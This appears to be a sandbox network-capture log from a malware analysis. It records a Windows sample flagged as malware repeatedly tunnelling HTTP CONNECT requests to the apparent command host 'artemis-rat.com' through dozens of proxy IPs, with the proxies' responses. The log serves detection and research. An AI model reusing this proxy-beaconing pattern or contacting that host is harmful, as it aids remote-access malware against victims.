                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              137192.168.2.450284147.75.92.24494017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.587758064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.870464087 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              138192.168.2.450350185.162.229.70807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.589340925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.743608952 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              139192.168.2.450357104.23.125.117807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.601377010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.756643057 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              140192.168.2.450352107.180.103.214132867284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.606918097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              141192.168.2.45023791.134.140.16088797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.608244896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.350539923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.428772926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.757101059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069747925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366498947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.663285971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.257056952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.569322109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              142192.168.2.450369104.20.75.132807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.618365049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.772955894 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              143192.168.2.450371104.17.171.79807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.620507956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.774935007 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              144192.168.2.450122112.5.128.7880607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.627656937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.155529022 CET300INHTTP/1.1 400 Bad Request
                                              Server: sws
                                              Date: Mon, 11 Mar 2024 07:39:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.15.6</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              145192.168.2.45030847.242.234.237807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.643388033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              146192.168.2.45025793.90.212.241537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.643388033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              147192.168.2.4503078.210.58.56807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.644239902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              148192.168.2.45028783.220.168.57101027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.648863077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.350559950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.638570070 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              149192.168.2.45031758.234.116.197807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.656205893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              150192.168.2.450405172.67.181.12807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.659291983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.813677073 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              151192.168.2.450318123.57.236.13988997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.659594059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              152192.168.2.450417172.67.182.102807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.661127090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.815170050 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              153192.168.2.450384192.163.202.88609647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.665915012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.147403002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.709985018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.834975958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.070192099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367222071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.663558006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.163412094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.163217068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              154192.168.2.450423104.27.8.161807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.671750069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.825985909 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              155192.168.2.450328174.77.111.19741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.672821999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              156192.168.2.450421162.159.242.62807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.677773952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.838757992 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              157192.168.2.4503228.222.152.158555557284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.695328951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.042244911 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:18.972002029 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              158192.168.2.45043812.186.205.121807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.712475061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.901753902 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.1
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
